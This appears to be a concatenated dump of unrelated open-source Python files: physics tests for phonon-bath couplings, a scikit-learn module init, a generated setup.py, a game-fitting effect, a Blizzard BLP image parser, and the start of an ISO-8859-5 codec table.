0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0-3.577708763999662j, -0.5257311121191319, 1.7888543819998328j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.525731112119132, 7.0, 0.850650808352039, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7888543819998326j, 0.8506508083520389, 7.0+3.5777087639996634j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 14.0]]]}
p = ParametersDoubleDotSpinfulElPh()
for indexing in ['Lin', 'charge', 'sz', 'ssq']:
si = StateIndexing(4, indexing=indexing)
leads = PhononBaths(p.nbaths, {}, si, {}, {}, {})
Tba0 = elph_construct_Vbbp(leads, p.velph)
Tba = elph_rotate_Vbbp(Tba0, p.vecs[indexing], si)
assert norm(Tba - data[indexing]) < EPS
def test_make_velph_dict():
nsingle = 4
nbaths = 2
si = StateIndexing(nsingle)
si.nbaths = nbaths
#
b1_cL, b1_cR, b1_oL, b1_oR = 7.0, 5.0, 2.0j, 1.0j
b2_cL, b2_cR, b2_oL, b2_oR = 70.0, 50.0, 20.0j, 10.0j
velph_dict = {(0,0,0): b1_cL, (0,2,2): b1_cL, (0,1,1): b1_cR, (0,3,3): b1_cR, (0,0,1): b1_oL, (0,1,0): b1_oR, (0,2,3): b1_oL, (0,3,2): b1_oR,
(1,0,0): b2_cL, (1,2,2): b2_cL, (1,1,1): b2_cR, (1,3,3): b2_cR, (1,0,1): b2_oL, (1,1,0): b2_oR, (1,2,3): b2_oL, (1,3,2): b2_oR}
velph_list = [[0,0,0,b1_cL], [0,2,2,b1_cL], [0,1,1,b1_cR], [0,3,3,b1_cR], [0,0,1,b1_oL], [0,1,0,b1_oR], [0,2,3,b1_oL], [0,3,2,b1_oR],
[1,0,0,b2_cL], [1,2,2,b2_cL], [1,1,1,b2_cR], [1,3,3,b2_cR], [1,0,1,b2_oL], [1,1,0,b2_oR], [1,2,3,b2_oL], [1,3,2,b2_oR]]
velph_mtr = [[[b1_cL, b1_oL, 0.0, 0.0], [b1_oR, b1_cR, 0.0, 0.0], [0.0, 0.0, b1_cL, b1_oL], [0.0, 0.0, b1_oR, b1_cR]],
[[b2_cL, b2_oL, 0.0, 0.0], [b2_oR, b2_cR, 0.0, 0.0], [0.0, 0.0, b2_cL, b2_oL], [0.0, 0.0, b2_oR, b2_cR]]]
assert make_velph_dict(velph_list, si) == velph_dict
assert make_velph_dict(velph_dict, si) == velph_dict
assert make_velph_dict(np.array(velph_mtr), si) == velph_dict
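# Exercise PhononBaths construction and the add()/change() update semantics for
# couplings, temperatures and bandwidth cutoffs given as dicts, lists or scalars.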
def test_PhononBaths():
nsingle = 2
nbaths = 2
b1_elph_d, b1_elph_o = 1.0, 2.0
b2_elph_d, b2_elph_o = 3.0, 4.0
temp_ph, dband_ph_min, dband_ph_max = 1.0, 0.1, 60.0
dband_ph = [dband_ph_min, dband_ph_max]
tlst_ph = {0: temp_ph, 1: temp_ph}
dlst_ph = {0: dband_ph, 1: dband_ph}
velph = np.array([[[b1_elph_d,b1_elph_o], [b1_elph_o,b1_elph_d]],
[[b2_elph_d,b2_elph_o], [b2_elph_o,b2_elph_d]]])
si = StateIndexing(nsingle)
baths = PhononBaths(nbaths, velph, si, tlst_ph, dlst_ph)
#
velph_dict = {(0,0,0):b1_elph_d, (0,1,1):b1_elph_d, (0,0,1):b1_elph_o, (0,1,0):b1_elph_o,
(1,0,0):b2_elph_d, (1,1,1):b2_elph_d, (1,0,1):b2_elph_o, (1,1,0):b2_elph_o}
assert baths.velph == velph_dict
assert baths.si.nbaths == 2
assert baths.tlst_ph.tolist() == [temp_ph, temp_ph]
assert baths.dlst_ph.tolist() == [dband_ph, dband_ph]
#
baths.add(velph={(0,0,0):1.0, (0,1,1):2.0, (0,0,1):3.0, (0,1,0):4.0,
(1,0,0):5.0, (1,1,1):6.0, (1,0,1):7.0, (1,1,0):8.0},
tlst_ph={0:1.0, 1:2.0},
dlst_ph={0:[1.0,2.0], 1:[3.0,4.0]})
assert baths.velph == {(0,0,0):b1_elph_d+1.0, (0,1,1):b1_elph_d+2.0, (0,0,1):b1_elph_o+3.0, (0,1,0):b1_elph_o+4.0,
(1,0,0):b2_elph_d+5.0, (1,1,1):b2_elph_d+6.0, (1,0,1):b2_elph_o+7.0, (1,1,0):b2_elph_o+8.0}
assert baths.tlst_ph.tolist() == [temp_ph+1.0, temp_ph+2.0]
assert baths.dlst_ph.tolist() == [[dband_ph_min+1.0,dband_ph_max+2.0], [dband_ph_min+3.0,dband_ph_max+4.0]]
#
baths.change(velph=velph_dict,
tlst_ph=[temp_ph, temp_ph],
dlst_ph=[dband_ph, dband_ph])
assert baths.velph == velph_dict
assert baths.tlst_ph.tolist() == [temp_ph, temp_ph]
assert baths.dlst_ph.tolist() == [dband_ph, dband_ph]
#
baths.change(tlst_ph={1: 2.13}, dlst_ph={1: [3.21,3.22]})
assert baths.tlst_ph.tolist() == [temp_ph, 2.13]
assert baths.dlst_ph.tolist() == [[dband_ph_min,dband_ph_max], [3.21,3.22]]
baths.add(tlst_ph={1: 2.13}, dlst_ph={1: [3.21,3.22]})
assert baths.tlst_ph.tolist() == [temp_ph, 2*2.13]
assert baths.dlst_ph.tolist() == [[dband_ph_min,dband_ph_max], [2*3.21,2*3.22]]
#
baths.change(tlst_ph=2)
assert baths.tlst_ph.tolist() == [2, 2]
baths.change(tlst_ph=tlst_ph)
baths.add(tlst_ph=2)
assert baths.tlst_ph.tolist() == [temp_ph+2, temp_ph+2]
#
Tba_tmp = np.array(baths.Vbbp)
baths.Vbbp.fill(0.0)
baths.use_Vbbp0()
assert norm(baths.Vbbp - Tba_tmp) < EPS
def test_PhononBaths_spin():
nsingle = 4
nbaths = 2
b1_elph_d, b1_elph_o = 1.0, 2.0
b2_elph_d, b2_elph_o = 3.0, 4.0
temp_ph, dband_ph_min, dband_ph_max = 1.0, 0.1, 60.0
dband_ph = [dband_ph_min, dband_ph_max]
tlst_ph = {0: temp_ph, 1: temp_ph}
dlst_ph = {0: dband_ph, 1: dband_ph}
velph = np.array([[[b1_elph_d,b1_elph_o], [b1_elph_o,b1_elph_d]],
[[b2_elph_d,b2_elph_o], [b2_elph_o,b2_elph_d]]])
si = StateIndexing(nsingle, symmetry='spin')
baths = PhononBaths(nbaths, velph, si, tlst_ph, dlst_ph)
#
velph_dict_no_spin = {(0,0,0):b1_elph_d, (0,1,1):b1_elph_d, (0,0,1):b1_elph_o, (0,1,0):b1_elph_o,
(1,0,0):b2_elph_d, (1,1,1):b2_elph_d, (1,0,1):b2_elph_o, (1,1,0):b2_elph_o}
velph_dict = {(0,0,0):b1_elph_d, (0,1,1):b1_elph_d, (0,0,1):b1_elph_o, (0,1,0):b1_elph_o,
(1,0,0):b2_elph_d, (1,1,1):b2_elph_d, (1,0,1):b2_elph_o, (1,1,0):b2_elph_o,
(0,2,2):b1_elph_d, (0,3,3):b1_elph_d, (0,2,3):b1_elph_o, (0,3,2):b1_elph_o,
(1,2,2):b2_elph_d, (1,3,3):b2_elph_d, (1,2,3):b2_elph_o, (1,3,2):b2_elph_o}
assert baths.velph == velph_dict
assert baths.si.nbaths == 2
assert baths.tlst_ph.tolist() == [temp_ph, temp_ph]
assert baths.dlst_ph.tolist() == [dband_ph, dband_ph]
#
baths.add(velph={(0,0,0):1.0, (0,1,1):2.0, (0,0,1):3.0, (0,1,0):4.0,
(1,0,0):5.0, (1,1,1):6.0, (1,0,1):7.0, (1,1,0):8.0},
tlst_ph={0:1.0, 1:2.0},
dlst_ph={0:[1.0,2.0], 1:[3.0,4.0]})
assert baths.velph == {(0,0,0):b1_elph_d+1.0, (0,1,1):b1_elph_d+2.0, (0,0,1):b1_elph_o+3.0, (0,1,0):b1_elph_o+4.0,
(1,0,0):b2_elph_d+5.0, (1,1,1):b2_elph_d+6.0, (1,0,1):b2_elph_o+7.0, (1,1,0):b2_elph_o+8.0,
(0,2,2):b1_elph_d+1.0, (0,3,3):b1_elph_d+2.0, (0,2,3):b1_elph_o+3.0, (0,3,2):b1_elph_o+4.0,
(1,2,2):b2_elph_d+5.0, (1,3,3):b2_elph_d+6.0, (1,2,3):b2_elph_o+7.0, (1,3,2):b2_elph_o+8.0}
assert baths.tlst_ph.tolist() == [temp_ph+1.0, temp_ph+2.0]
assert baths.dlst_ph.tolist() == [[dband_ph_min+1.0,dband_ph_max+2.0], [dband_ph_min+3.0,dband_ph_max+4.0]]
#
baths.change(velph=velph_dict_no_spin,
tlst_ph=[temp_ph, temp_ph],
dlst_ph=[dband_ph, dband_ph])
assert baths.velph == velph_dict
assert baths.tlst_ph.tolist() == [temp_ph, temp_ph]
assert baths.dlst_ph.tolist() == [dband_ph, dband_ph]
#
baths.change(tlst_ph={1: 2.13}, dlst_ph={1: [3.21,3.22]})
assert baths.tlst_ph.tolist() == [temp_ph, 2.13]
assert baths.dlst_ph.tolist() == [[dband_ph_min,dband_ph_max], [3.21,3.22]]
baths.add(tlst_ph={1: 2.13}, dlst_ph={1: [3.21,3.22]})
assert baths.tlst_ph.tolist() == [temp_ph, 2*2.13]
assert baths.dlst_ph.tolist() == [[dband_ph_min,dband_ph_max], [2*3.21,2*3.22]]
#
baths.change(tlst_ph=2)
assert baths.tlst_ph.tolist() == [2, 2]
baths.change(tlst_ph=tlst_ph)
baths.add(tlst_ph=2)
assert baths.tlst_ph.tolist() == [temp_ph+2, temp_ph+2]
#
Tba_tmp = np.array(baths.Vbbp)
baths.Vbbp.fill(0.0)
baths.use_Vbbp0()
assert norm(baths.Vbbp - Tba_tmp) < EPS
|
moutai/scikit-learn
|
refs/heads/master
|
sklearn/feature_selection/__init__.py
|
140
|
"""
The :mod:`sklearn.feature_selection` module implements feature selection
algorithms. It currently includes univariate filter selection methods and the
recursive feature elimination algorithm.
"""
from .univariate_selection import chi2
from .univariate_selection import f_classif
from .univariate_selection import f_oneway
from .univariate_selection import f_regression
from .univariate_selection import SelectPercentile
from .univariate_selection import SelectKBest
from .univariate_selection import SelectFpr
from .univariate_selection import SelectFdr
from .univariate_selection import SelectFwe
from .univariate_selection import GenericUnivariateSelect
from .variance_threshold import VarianceThreshold
from .rfe import RFE
from .rfe import RFECV
from .from_model import SelectFromModel
from .mutual_info_ import mutual_info_regression, mutual_info_classif
__all__ = ['GenericUnivariateSelect',
'RFE',
'RFECV',
'SelectFdr',
'SelectFpr',
'SelectFwe',
'SelectKBest',
'SelectFromModel',
'SelectPercentile',
'VarianceThreshold',
'chi2',
'f_classif',
'f_oneway',
'f_regression',
'mutual_info_classif',
'mutual_info_regression']
|
stankovski/AutoRest
|
refs/heads/master
|
AutoRest/Generators/Python/Python.Tests/Expected/AcceptanceTests/Report/setup.py
|
2
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages
NAME = "autorestreportservice"
VERSION = "1.0.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["msrest>=0.1.0"]
setup(
name=NAME,
version=VERSION,
description="AutoRestReportService",
author_email="",
url="",
keywords=["Swagger", "AutoRestReportService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Test Infrastructure for AutoRest
"""
)
|
Ebag333/Pyfa
|
refs/heads/master
|
eos/effects/remotehullrepair.py
|
1
|
# Not used by any item
type = "projected", "active"
runTime = "late"
def handler(fit, module, context):
if "projected" not in context:
return
bonus = module.getModifiedItemAttr("structureDamageAmount")
duration = module.getModifiedItemAttr("duration") / 1000.0
fit.extraAttributes.increase("hullRepair", bonus / duration)
|
hernandito/SickRage
|
refs/heads/master
|
lib/hachoir_parser/game/blp.py
|
86
|
"""
Blizzard BLP Image File Parser
Author: Robert Xiao
Creation date: July 10 2007
- BLP1 File Format
http://magos.thejefffiles.com/War3ModelEditor/MagosBlpFormat.txt
- BLP2 File Format (Wikipedia)
http://en.wikipedia.org/wiki/.BLP
- S3TC (DXT1, 3, 5) Formats
http://en.wikipedia.org/wiki/S3_Texture_Compression
"""
from hachoir_core.endian import LITTLE_ENDIAN
from hachoir_core.field import String, UInt32, UInt8, Enum, FieldSet, RawBytes, GenericVector, Bit, Bits
from hachoir_parser.parser import Parser
from hachoir_parser.image.common import PaletteRGBA
from hachoir_core.tools import alignValue
class PaletteIndex(UInt8):
def createDescription(self):
return "Palette index %i (%s)" % (self.value, self["/palette/color[%i]" % self.value].description)
class Generic2DArray(FieldSet):
def __init__(self, parent, name, width, height, item_class, row_name="row", item_name="item", *args, **kwargs):
FieldSet.__init__(self, parent, name, *args, **kwargs)
self.width = width
self.height = height
self.item_class = item_class
self.row_name = row_name
self.item_name = item_name
def createFields(self):
for i in xrange(self.height):
yield GenericVector(self, self.row_name+"[]", self.width, self.item_class, self.item_name)
class BLP1File(Parser):
MAGIC = "BLP1"
PARSER_TAGS = {
"id": "blp1",
"category": "game",
"file_ext": ("blp",),
"mime": (u"application/x-blp",), # TODO: real mime type???
"magic": ((MAGIC, 0),),
"min_size": 7*32, # 7 DWORDs start, incl. magic
"description": "Blizzard Image Format, version 1",
}
endian = LITTLE_ENDIAN
def validate(self):
if self.stream.readBytes(0, 4) != "BLP1":
return "Invalid magic"
return True
def createFields(self):
yield String(self, "magic", 4, "Signature (BLP1)")
yield Enum(UInt32(self, "compression"), {
0:"JPEG Compression",
1:"Uncompressed"})
yield UInt32(self, "flags")
yield UInt32(self, "width")
yield UInt32(self, "height")
yield Enum(UInt32(self, "type"), {
3:"Uncompressed Index List + Alpha List",
4:"Uncompressed Index List + Alpha List",
5:"Uncompressed Index List"})
yield UInt32(self, "subtype")
for i in xrange(16):
yield UInt32(self, "mipmap_offset[]")
for i in xrange(16):
yield UInt32(self, "mipmap_size[]")
compression = self["compression"].value
image_type = self["type"].value
width = self["width"].value
height = self["height"].value
if compression == 0: # JPEG Compression
yield UInt32(self, "jpeg_header_len")
yield RawBytes(self, "jpeg_header", self["jpeg_header_len"].value, "Shared JPEG Header")
else:
yield PaletteRGBA(self, "palette", 256)
offsets = self.array("mipmap_offset")
sizes = self.array("mipmap_size")
for i in xrange(16):
if not offsets[i].value or not sizes[i].value:
continue
padding = self.seekByte(offsets[i].value)
if padding:
yield padding
if compression == 0:
yield RawBytes(self, "mipmap[%i]" % i, sizes[i].value, "JPEG data, append to header to recover complete image")
elif compression == 1:
yield Generic2DArray(self, "mipmap_indexes[%i]" % i, width, height, PaletteIndex, "row", "index", "Indexes into the palette")
if image_type in (3, 4):
yield Generic2DArray(self, "mipmap_alphas[%i]" % i, width, height, UInt8, "row", "alpha", "Alpha values")
width /= 2
height /= 2
def interp_avg(data_low, data_high, n):
"""Interpolated averages. For example,
>>> list(interp_avg(1, 10, 3))
[4, 7]
"""
if isinstance(data_low, (int, long)):
for i in range(1, n):
yield (data_low * (n-i) + data_high * i) / n
else: # iterable
pairs = zip(data_low, data_high)
pair_iters = [interp_avg(x, y, n) for x, y in pairs]
for i in range(1, n):
yield [iter.next() for iter in pair_iters]
def color_name(data, bits):
"""Color names in #RRGGBB format, given the number of bits for each component."""
ret = ["#"]
for i in range(3):
ret.append("%02X" % (data[i] << (8-bits[i])))
return ''.join(ret)
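# A 64-bit DXT1/S3TC block: two RGB565 endpoint colors followed by sixteen
# 2-bit indexes selecting an endpoint, an interpolated color, or (in
# three-color mode) transparency.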
class DXT1(FieldSet):
static_size = 64
def __init__(self, parent, name, dxt2_mode=False, *args, **kwargs):
"""with dxt2_mode on, this field will always use the four color model"""
FieldSet.__init__(self, parent, name, *args, **kwargs)
self.dxt2_mode = dxt2_mode
def createFields(self):
values = [[], []]
for i in (0, 1):
yield Bits(self, "blue[]", 5)
yield Bits(self, "green[]", 6)
yield Bits(self, "red[]", 5)
values[i] = [self["red[%i]" % i].value,
self["green[%i]" % i].value,
self["blue[%i]" % i].value]
if values[0] > values[1] or self.dxt2_mode:
values += interp_avg(values[0], values[1], 3)
else:
values += interp_avg(values[0], values[1], 2)
values.append(None) # transparent
for i in xrange(16):
pixel = Bits(self, "pixel[%i][%i]" % divmod(i, 4), 2)
color = values[pixel.value]
if color is None:
pixel._description = "Transparent"
else:
pixel._description = "RGB color: %s" % color_name(color, [5, 6, 5])
yield pixel
class DXT3Alpha(FieldSet):
static_size = 64
def createFields(self):
for i in xrange(16):
yield Bits(self, "alpha[%i][%i]" % divmod(i, 4), 4)
class DXT3(FieldSet):
static_size = 128
def createFields(self):
yield DXT3Alpha(self, "alpha", "Alpha Channel Data")
yield DXT1(self, "color", True, "Color Channel Data")
class DXT5Alpha(FieldSet):
static_size = 64
def createFields(self):
values = []
yield UInt8(self, "alpha_val[0]", "First alpha value")
values.append(self["alpha_val[0]"].value)
yield UInt8(self, "alpha_val[1]", "Second alpha value")
values.append(self["alpha_val[1]"].value)
if values[0] > values[1]:
values += interp_avg(values[0], values[1], 7)
else:
values += interp_avg(values[0], values[1], 5)
values += [0, 255]
for i in xrange(16):
pixel = Bits(self, "alpha[%i][%i]" % divmod(i, 4), 3)
alpha = values[pixel.value]
pixel._description = "Alpha value: %i" % alpha
yield pixel
class DXT5(FieldSet):
static_size = 128
def createFields(self):
yield DXT5Alpha(self, "alpha", "Alpha Channel Data")
yield DXT1(self, "color", True, "Color Channel Data")
class BLP2File(Parser):
MAGIC = "BLP2"
PARSER_TAGS = {
"id": "blp2",
"category": "game",
"file_ext": ("blp",),
"mime": (u"application/x-blp",),
"magic": ((MAGIC, 0),),
"min_size": 5*32, # 5 DWORDs start, incl. magic
"description": "Blizzard Image Format, version 2",
}
endian = LITTLE_ENDIAN
def validate(self):
if self.stream.readBytes(0, 4) != "BLP2":
return "Invalid magic"
return True
def createFields(self):
yield String(self, "magic", 4, "Signature (BLP2)")
yield Enum(UInt32(self, "compression", "Compression type"), {
0:"JPEG Compressed",
1:"Uncompressed or DXT/S3TC compressed"})
yield Enum(UInt8(self, "encoding", "Encoding type"), {
1:"Raw",
2:"DXT/S3TC Texture Compression (a.k.a. DirectX)"})
yield UInt8(self, "alpha_depth", "Alpha channel depth, in bits (0 = no alpha)")
yield Enum(UInt8(self, "alpha_encoding", "Encoding used for alpha channel"), {
0:"DXT1 alpha (0 or 1 bit alpha)",
1:"DXT3 alpha (4 bit alpha)",
7:"DXT5 alpha (8 bit interpolated alpha)"})
yield Enum(UInt8(self, "has_mips", "Are mip levels present?"), {
0:"No mip levels",
1:"Mip levels present; number of levels determined by image size"})
yield UInt32(self, "width", "Base image width")
yield UInt32(self, "height", "Base image height")
for i in xrange(16):
yield UInt32(self, "mipmap_offset[]")
for i in xrange(16):
yield UInt32(self, "mipmap_size[]")
yield PaletteRGBA(self, "palette", 256)
compression = self["compression"].value
encoding = self["encoding"].value
alpha_depth = self["alpha_depth"].value
alpha_encoding = self["alpha_encoding"].value
width = self["width"].value
height = self["height"].value
if compression == 0: # JPEG Compression
yield UInt32(self, "jpeg_header_len")
yield RawBytes(self, "jpeg_header", self["jpeg_header_len"].value, "Shared JPEG Header")
offsets = self.array("mipmap_offset")
sizes = self.array("mipmap_size")
for i in xrange(16):
if not offsets[i].value or not sizes[i].value:
continue
padding = self.seekByte(offsets[i].value)
if padding:
yield padding
if compression == 0:
yield RawBytes(self, "mipmap[%i]" % i, sizes[i].value, "JPEG data, append to header to recover complete image")
elif compression == 1 and encoding == 1:
yield Generic2DArray(self, "mipmap_indexes[%i]" % i, height, width, PaletteIndex, "row", "index", "Indexes into the palette")
if alpha_depth == 1:
yield GenericVector(self, "mipmap_alphas[%i]" % i, height, width, Bit, "row", "is_opaque", "Alpha values")
elif alpha_depth == 8:
yield GenericVector(self, "mipmap_alphas[%i]" % i, height, width, UInt8, "row", "alpha", "Alpha values")
elif compression == 1 and encoding == 2:
block_height = alignValue(height, 4) // 4
block_width = alignValue(width, 4) // 4
if alpha_depth in [0, 1] and alpha_encoding == 0:
yield Generic2DArray(self, "mipmap[%i]" % i, block_height, block_width, DXT1, "row", "block", "DXT1-compressed image blocks")
elif alpha_depth == 8 and alpha_encoding == 1:
yield Generic2DArray(self, "mipmap[%i]" % i, block_height, block_width, DXT3, "row", "block", "DXT3-compressed image blocks")
elif alpha_depth == 8 and alpha_encoding == 7:
yield Generic2DArray(self, "mipmap[%i]" % i, block_height, block_width, DXT5, "row", "block", "DXT5-compressed image blocks")
width /= 2
height /= 2
|
jjingrong/PONUS-1.2
|
refs/heads/master
|
venv/Lib/encodings/iso8859_5.py
|
593
|
""" Python Character Mapping Codec iso8859_5 generated from 'MAPPINGS/ISO8859/8859-5.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-5',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\x80' # 0x80 -> <control>
u'\x81' # 0x81 -> <control>
u'\x82' # 0x82 -> <control>
u'\x83' # 0x83 -> <control>
u'\x84' # 0x84 -> <control>
u'\x85' # 0x85 -> <control>
u'\x86' # 0x86 -> <control>
